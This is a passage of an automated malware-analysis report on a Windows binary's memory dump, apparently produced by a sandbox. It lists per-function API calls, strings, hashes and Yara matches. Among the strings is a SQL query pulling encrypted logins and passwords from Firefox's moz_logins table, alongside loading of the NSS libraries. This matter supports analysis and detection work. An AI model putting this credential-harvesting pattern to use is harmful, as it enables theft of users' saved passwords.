                                                                                                                                                                  • API ID: memsetstrcpy$wcscpy$wcscat$AddressProc$ByteCharHandleLibraryLoadModuleMultiWide
                                                                                                                                                                  • String ID: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword, timeCreated, timeLastUsed, timePasswordChanged, timesUsed FROM moz_logins
                                                                                                                                                                  • API String ID: 2096775815-1337997248
                                                                                                                                                                  • Opcode ID: 2e12d6ea0480d97641cb46f238cf2080cd592d40d485f85ffcf83cfd2d87e7a7
                                                                                                                                                                  • Instruction ID: 3c2b171134edc849c89bfde98875369ff40149e6fc896e2c8c158776e68e1888
                                                                                                                                                                  • Opcode Fuzzy Hash: 2e12d6ea0480d97641cb46f238cf2080cd592d40d485f85ffcf83cfd2d87e7a7
                                                                                                                                                                  • Instruction Fuzzy Hash: 61912A72C0425EAFDF10DF94DC819DEBBB4EF04315F10406BE505B2191EA39AA94CB59
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00417F9B, Relevance: 16.6, APIs: 11, Instructions: 88COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00416CB6: GetVersionExW.KERNEL32(?), ref: 00416CD9
                                                                                                                                                                  • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 00417FC7
                                                                                                                                                                  • malloc.MSVCRT ref: 00417FD2
                                                                                                                                                                  • free.MSVCRT(?), ref: 00417FE2
                                                                                                                                                                  • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00417FF6
                                                                                                                                                                  • free.MSVCRT(?), ref: 00417FFB
                                                                                                                                                                  • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 00418011
                                                                                                                                                                  • malloc.MSVCRT ref: 00418019
                                                                                                                                                                  • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 0041802C
                                                                                                                                                                  • free.MSVCRT(?), ref: 00418031
                                                                                                                                                                  • free.MSVCRT(?), ref: 00418045
                                                                                                                                                                  • free.MSVCRT(00000000,0044C838,00000000), ref: 00418064
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: free$FullNamePath$malloc$Version
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3356672799-0
                                                                                                                                                                  • Opcode ID: 4281f6dcf499aebe880315d56d8890ea297e638ba0a2e688ee01e2e55a4b7441
                                                                                                                                                                  • Instruction ID: e19f7d1979d0248284e652c075024004b82b0c137a295abbe9fd7512c3376d02
                                                                                                                                                                  • Opcode Fuzzy Hash: 4281f6dcf499aebe880315d56d8890ea297e638ba0a2e688ee01e2e55a4b7441
                                                                                                                                                                  • Instruction Fuzzy Hash: AA218675904118BFEF10BBA5EC46CDF7FB9DF41398B22016BF404A2161DE395E819968
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00407F9A, Relevance: 16.6, APIs: 11, Instructions: 59clipboardmemoryfileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • EmptyClipboard.USER32 ref: 00407FA4
                                                                                                                                                                    • Part of subcall function 00407D7B: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,00444305,00000000,?,00000000,00000000,0041274B,?,?), ref: 00407D8D
                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00407FC1
                                                                                                                                                                  • GlobalAlloc.KERNEL32(00002000,00000002), ref: 00407FD2
                                                                                                                                                                  • GlobalLock.KERNEL32 ref: 00407FDF
                                                                                                                                                                  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00407FF2
                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00408004
                                                                                                                                                                  • SetClipboardData.USER32 ref: 0040800D
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00408015
                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00408021
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0040802C
                                                                                                                                                                  • CloseClipboard.USER32 ref: 00408035
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3604893535-0
                                                                                                                                                                  • Opcode ID: df7f886e945f591bfda75065e4edf3e41638ed4f771c2343fc9f9f7254ae204e
                                                                                                                                                                  • Instruction ID: 9cea1fd89fc17267dcd3af91661d4008ede421ba1dc4d9805cb8839a0273d96b
                                                                                                                                                                  • Opcode Fuzzy Hash: df7f886e945f591bfda75065e4edf3e41638ed4f771c2343fc9f9f7254ae204e
                                                                                                                                                                  • Instruction Fuzzy Hash: 71113D7A900A04FBDF105FB0ED4CB9E7BB8EB45365F100176F942E52A2DB748904DB68
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004144DA, Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 50COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: wcscpy
                                                                                                                                                                  • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                                                                  • API String ID: 1284135714-318151290
                                                                                                                                                                  • Opcode ID: bfadb20ff740d820eb56dcb57501d1229147ac2dc18d3832aa90891d3b4f6c13
                                                                                                                                                                  • Instruction ID: 0ebae4f713cd0728fe49c3fef23c10be13eea51f6af137ba8aced86fbfd041bd
                                                                                                                                                                  • Opcode Fuzzy Hash: bfadb20ff740d820eb56dcb57501d1229147ac2dc18d3832aa90891d3b4f6c13
                                                                                                                                                                  • Instruction Fuzzy Hash: 59F0BBB169462D73342E25B85806AF70483F0C1B0537E45537702EA6D6EA4CCAC1E89F
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040B478, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                                                                                  • String ID: 0$6
                                                                                                                                                                  • API String ID: 4066108131-3849865405
                                                                                                                                                                  • Opcode ID: b79568a4bc0d31f153f724f739672314f24d182ceeaf87f3ebd535909d0644a4
                                                                                                                                                                  • Instruction ID: bceec671b1c8862383177497c079c71e13407bcb6d3a60011dae78a89f936b1e
                                                                                                                                                                  • Opcode Fuzzy Hash: b79568a4bc0d31f153f724f739672314f24d182ceeaf87f3ebd535909d0644a4
                                                                                                                                                                  • Instruction Fuzzy Hash: 65315BB2408340AFDB109F95DC44A9BB7E8FF89318F00487FF948A2291D779D905CB9A
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00403C8C, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040FF6D,00000000,?,00000002,?,004448C6,00000000,?,0000000A), ref: 00403CAB
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00403CBD
                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040FF6D,00000000,?,00000002,?,004448C6,00000000,?,0000000A), ref: 00403CD1
                                                                                                                                                                  • #17.COMCTL32(?,00000002,?,?,?,0040FF6D,00000000,?,00000002,?,004448C6,00000000,?,0000000A), ref: 00403CDF
                                                                                                                                                                  • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00403CFC
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                                  • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                  • API String ID: 2780580303-317687271
                                                                                                                                                                  • Opcode ID: 66f0956d2bdd33e57a9d75159f698099ad879889c70df319cc2ace5e9580e212
                                                                                                                                                                  • Instruction ID: 34266bbb316567afe830504356b8b6584aa457591d2bf79f0dcd5bedfca56d80
                                                                                                                                                                  • Opcode Fuzzy Hash: 66f0956d2bdd33e57a9d75159f698099ad879889c70df319cc2ace5e9580e212
                                                                                                                                                                  • Instruction Fuzzy Hash: B801D676754B116BEB215F649C89B6B7D9CEF42B4AB004039F502F2181DAB8DE0196A8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0041171B, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 32COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(nss3.dll,00000000,?,?,76D257F0,00411871,?,?,?,?,?,00000000), ref: 0041172A
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(sqlite3.dll,?,76D257F0,00411871,?,?,?,?,?,00000000), ref: 00411733
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(mozsqlite3.dll,?,76D257F0,00411871,?,?,?,?,?,00000000), ref: 0041173C
                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,76D257F0,00411871,?,?,?,?,?,00000000), ref: 0041174B
                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,76D257F0,00411871,?,?,?,?,?,00000000), ref: 00411752
                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,76D257F0,00411871,?,?,?,?,?,00000000), ref: 00411759
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FreeHandleLibraryModule
                                                                                                                                                                  • String ID: mozsqlite3.dll$nss3.dll$sqlite3.dll
                                                                                                                                                                  • API String ID: 662261464-3550686275
                                                                                                                                                                  • Opcode ID: 0ba152906d568cc671e1b6f9d2e794e6ae63ac90640bfd5e0f9cb05d093c3698
                                                                                                                                                                  • Instruction ID: e2ab39130582ef49d5f09875a9cbab8dc3c3c45014a759ddc4c6379760142a6f
                                                                                                                                                                  • Opcode Fuzzy Hash: 0ba152906d568cc671e1b6f9d2e794e6ae63ac90640bfd5e0f9cb05d093c3698
                                                                                                                                                                  • Instruction Fuzzy Hash: 7AE04F66F4136DA79A1027F66C84EAB6F5CC896AA13150037AF05A33519EA89C018AF9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004440EA, Relevance: 15.2, APIs: 8, Strings: 2, Instructions: 183COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memcpy$memchrmemset
                                                                                                                                                                  • String ID: UCD$UCD
                                                                                                                                                                  • API String ID: 1581201632-670880344
                                                                                                                                                                  • Opcode ID: 466d59214c80b3bca22488233ffa0f6a545d692d30eb3385f305033defd9c4bb
                                                                                                                                                                  • Instruction ID: 346eebee7d7e8b6f8d140da3993cfc901939ed9edb34b9035315ebb9ce6523fc
                                                                                                                                                                  • Opcode Fuzzy Hash: 466d59214c80b3bca22488233ffa0f6a545d692d30eb3385f305033defd9c4bb
                                                                                                                                                                  • Instruction Fuzzy Hash: 8551D3719001195BEB10EFA8CC95FEEB7B8AF85300F0444ABF955E7281E778E644CB64
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004085D0, Relevance: 15.1, APIs: 10, Instructions: 103COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetSystemMetrics.USER32 ref: 004085E9
                                                                                                                                                                  • GetSystemMetrics.USER32 ref: 004085EF
                                                                                                                                                                  • GetDC.USER32(00000000), ref: 004085FC
                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040860D
                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00408614
                                                                                                                                                                  • ReleaseDC.USER32 ref: 0040861B
                                                                                                                                                                  • GetWindowRect.USER32 ref: 0040862E
                                                                                                                                                                  • GetParent.USER32(?), ref: 00408633
                                                                                                                                                                  • GetWindowRect.USER32 ref: 00408650
                                                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 004086AF
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2163313125-0
                                                                                                                                                                  • Opcode ID: f1fece8f71670097fa47147ff3162736aa5b7fc67ad6ee2a4cdb5b150032ca2b
                                                                                                                                                                  • Instruction ID: 6b5921239ffcae24bde8aad05d59603f054fe97e3a0e5988cf4f66e7c2dd28aa
                                                                                                                                                                  • Opcode Fuzzy Hash: f1fece8f71670097fa47147ff3162736aa5b7fc67ad6ee2a4cdb5b150032ca2b
                                                                                                                                                                  • Instruction Fuzzy Hash: 2E31A475A00609AFDF04CFB8CD85AEEBBB9FB48350F050539E901F3291DA71ED418A94
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00402D82, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 192COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: free$wcslen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3592753638-3916222277
                                                                                                                                                                  • Opcode ID: 490489ed51bc5752fe94a4990fd5cd344a627c9c2c9d2179b2f34b9e7a32eba5
                                                                                                                                                                  • Instruction ID: 99c2379fcd531e162887146704610c03ee1d54022b9859d6cf2ce1b1ac3fe7c7
                                                                                                                                                                  • Opcode Fuzzy Hash: 490489ed51bc5752fe94a4990fd5cd344a627c9c2c9d2179b2f34b9e7a32eba5
                                                                                                                                                                  • Instruction Fuzzy Hash: 87616630408342DBDB68AF11D64852FB7B1FF84755F90093FF482A22D0D7B88989DB9A
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040BB24, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 83windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadMenuW.USER32 ref: 0040BB4B
                                                                                                                                                                    • Part of subcall function 0040B974: GetMenuItemCount.USER32 ref: 0040B98A
                                                                                                                                                                    • Part of subcall function 0040B974: memset.MSVCRT ref: 0040B9A9
                                                                                                                                                                    • Part of subcall function 0040B974: GetMenuItemInfoW.USER32 ref: 0040B9E5
                                                                                                                                                                    • Part of subcall function 0040B974: wcschr.MSVCRT ref: 0040B9FD
                                                                                                                                                                  • DestroyMenu.USER32(00000000), ref: 0040BB69
                                                                                                                                                                  • CreateDialogParamW.USER32 ref: 0040BBB7
                                                                                                                                                                  • memset.MSVCRT ref: 0040BBD3
                                                                                                                                                                  • GetWindowTextW.USER32 ref: 0040BBE8
                                                                                                                                                                  • EnumChildWindows.USER32 ref: 0040BC13
                                                                                                                                                                  • DestroyWindow.USER32(00000000), ref: 0040BC1A
                                                                                                                                                                    • Part of subcall function 0040B7A3: _snwprintf.MSVCRT ref: 0040B7C8
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Menu$DestroyItemWindowmemset$ChildCountCreateDialogEnumInfoLoadParamTextWindows_snwprintfwcschr
                                                                                                                                                                  • String ID: caption
                                                                                                                                                                  • API String ID: 1928666178-4135340389
                                                                                                                                                                  • Opcode ID: e424083c0ca5028a7f352563cdf0725328d58b63161901b2b272de0412def72f
                                                                                                                                                                  • Instruction ID: e22aff4ff37d874dc9406bb5861836d8cb00257f57c634ff68b223b0e4ee6d7d
                                                                                                                                                                  • Opcode Fuzzy Hash: e424083c0ca5028a7f352563cdf0725328d58b63161901b2b272de0412def72f
                                                                                                                                                                  • Instruction Fuzzy Hash: 6821A172500218ABEF21AF50EC49EAF3B78FF46754F00447AF905A5192DB789990CBDE
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00408AE8, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                                                                  • String ID: %s (%s)$TK@
                                                                                                                                                                  • API String ID: 3979103747-3557169880
                                                                                                                                                                  • Opcode ID: f4f66d51605293ffc8b9c0d396a24cc3e89f4468af1d1deabf9f37978fbe6db0
                                                                                                                                                                  • Instruction ID: e896be4b8b4c8dd321127e9193ea498031fb30aa9e34a4c02f498fe4f9df0790
                                                                                                                                                                  • Opcode Fuzzy Hash: f4f66d51605293ffc8b9c0d396a24cc3e89f4468af1d1deabf9f37978fbe6db0
                                                                                                                                                                  • Instruction Fuzzy Hash: 6F2162B2800118ABDF20DF95CC45E8AB7B8FF44318F05846AEA48A7106DB78E618CBD4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00407CF6, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00407E1C,?,00000000,?,0040DEA5,00000000,?,0040FF40,00000000), ref: 00407D1B
                                                                                                                                                                  • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00407E1C,?,00000000,?,0040DEA5), ref: 00407D39
                                                                                                                                                                  • wcslen.MSVCRT ref: 00407D46
                                                                                                                                                                  • wcscpy.MSVCRT ref: 00407D56
                                                                                                                                                                  • LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00407E1C,?,00000000,?,0040DEA5,00000000), ref: 00407D60
                                                                                                                                                                  • wcscpy.MSVCRT ref: 00407D70
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                                                                  • String ID: Unknown Error$netmsg.dll
                                                                                                                                                                  • API String ID: 2767993716-572158859
                                                                                                                                                                  • Opcode ID: 92f02a28e67b077d30d243fedb73b8a8cf66204261723a13f34f01c6e1a273b1
                                                                                                                                                                  • Instruction ID: f6f7092b450fef05d0d872bf5e04b1357ca4228fed94eee9f5e7a838667149bb
                                                                                                                                                                  • Opcode Fuzzy Hash: 92f02a28e67b077d30d243fedb73b8a8cf66204261723a13f34f01c6e1a273b1
                                                                                                                                                                  • Instruction Fuzzy Hash: D201F771A041147BFB1527A0EC4AFAF7B6CDF567A1F20003AF506B10D1EA786E00D6AD
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040BC8A, Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00408250: GetFileAttributesW.KERNELBASE(?,0040BC93,?,0040BD4A,00000000,?,00000000,00000208,?), ref: 00408254
                                                                                                                                                                  • wcscpy.MSVCRT ref: 0040BCA4
                                                                                                                                                                  • wcscpy.MSVCRT ref: 0040BCB4
                                                                                                                                                                  • GetPrivateProfileIntW.KERNEL32 ref: 0040BCC5
                                                                                                                                                                    • Part of subcall function 0040B82A: GetPrivateProfileStringW.KERNEL32(00453158,?,0044552C,004531E0,?,00452F48), ref: 0040B846
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                                                                  • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                                  • API String ID: 3176057301-2039793938
                                                                                                                                                                  • Opcode ID: bf7a0a351ce4cc8900ce4d7334675be5d5e82d406c6e89171aabba82c61a61db
                                                                                                                                                                  • Instruction ID: d09d9999bd57a78b58a4055e383115949195630bbf49bad653da3d74dfc2830b
                                                                                                                                                                  • Opcode Fuzzy Hash: bf7a0a351ce4cc8900ce4d7334675be5d5e82d406c6e89171aabba82c61a61db
                                                                                                                                                                  • Instruction Fuzzy Hash: 8AF0C232EC0A5137EB1137221D03F2A2608CF92B57F15847BB904762D3DA7C4A15D2DE
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0042EE6A, Relevance: 13.7, APIs: 2, Strings: 7, Instructions: 245COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • database is already attached, xrefs: 0042EF94
                                                                                                                                                                  • unable to open database: %s, xrefs: 0042F0C1
                                                                                                                                                                  • cannot ATTACH database within transaction, xrefs: 0042EED9
                                                                                                                                                                  • out of memory, xrefs: 0042F0D8
                                                                                                                                                                  • attached databases must use the same text encoding as main database, xrefs: 0042EFE2
                                                                                                                                                                  • too many attached databases - max %d, xrefs: 0042EEC3
                                                                                                                                                                  • database %s is already in use, xrefs: 0042EF3B
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memcpymemset
                                                                                                                                                                  • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                                  • API String ID: 1297977491-2001300268
                                                                                                                                                                  • Opcode ID: 5b15f45002721a9a60b4fb60247e63f78b1bd55caec31cf620cafc73cca17a46
                                                                                                                                                                  • Instruction ID: af9b9ef2f5a1795804296138b741be62980529f77760b3752da5ffa5b8d2aff6
                                                                                                                                                                  • Opcode Fuzzy Hash: 5b15f45002721a9a60b4fb60247e63f78b1bd55caec31cf620cafc73cca17a46
                                                                                                                                                                  • Instruction Fuzzy Hash: E991E370B00311EFEB10DF66D581BAAB7F0AF44308F94846FE8559B242D778E945CB59
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040C33A, Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 160COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0040C11B: ??3@YAXPAX@Z.MSVCRT ref: 0040C127
                                                                                                                                                                    • Part of subcall function 0040C11B: ??3@YAXPAX@Z.MSVCRT ref: 0040C135
                                                                                                                                                                    • Part of subcall function 0040C11B: ??3@YAXPAX@Z.MSVCRT ref: 0040C146
                                                                                                                                                                    • Part of subcall function 0040C11B: ??3@YAXPAX@Z.MSVCRT ref: 0040C15D
                                                                                                                                                                    • Part of subcall function 0040C11B: ??3@YAXPAX@Z.MSVCRT ref: 0040C166
                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040C37A
                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040C396
                                                                                                                                                                  • memcpy.MSVCRT ref: 0040C3BB
                                                                                                                                                                  • memcpy.MSVCRT ref: 0040C3CF
                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040C452
                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040C45C
                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040C494
                                                                                                                                                                    • Part of subcall function 0040B301: GetModuleHandleW.KERNEL32(00000000,?,?,0040C3FA,?,0040FE90,00000000,00000000,?), ref: 0040B340
                                                                                                                                                                    • Part of subcall function 0040B301: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040B3D9
                                                                                                                                                                    • Part of subcall function 0040B301: memcpy.MSVCRT ref: 0040B419
                                                                                                                                                                    • Part of subcall function 0040B301: wcscpy.MSVCRT ref: 0040B382
                                                                                                                                                                    • Part of subcall function 0040B301: wcslen.MSVCRT ref: 0040B3A0
                                                                                                                                                                    • Part of subcall function 0040B301: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040C3FA,?,0040FE90,00000000,00000000,?), ref: 0040B3AE
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                                                                  • String ID: 8"E$d
                                                                                                                                                                  • API String ID: 1140211610-2418960419
                                                                                                                                                                  • Opcode ID: 630083eee7cbf1c10867c7b3dfcb71eb0ae95e41edb8436bedb91c8cd5998a80
                                                                                                                                                                  • Instruction ID: ebdbfbf94f53a3690cf38ac0907b9363cbed6c4ceb444703d02dc3853126dfb0
                                                                                                                                                                  • Opcode Fuzzy Hash: 630083eee7cbf1c10867c7b3dfcb71eb0ae95e41edb8436bedb91c8cd5998a80
                                                                                                                                                                  • Instruction Fuzzy Hash: 3851AE726007049FD724DF29C586B5AB7E4FF48314F10862EE95ADB391DB78E5408B48
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004171A2, Relevance: 13.6, APIs: 9, Instructions: 126filesleepCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004171FA
                                                                                                                                                                  • Sleep.KERNEL32(00000001), ref: 00417204
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00417216
                                                                                                                                                                  • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004172EE
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$ErrorLastLockSleepUnlock
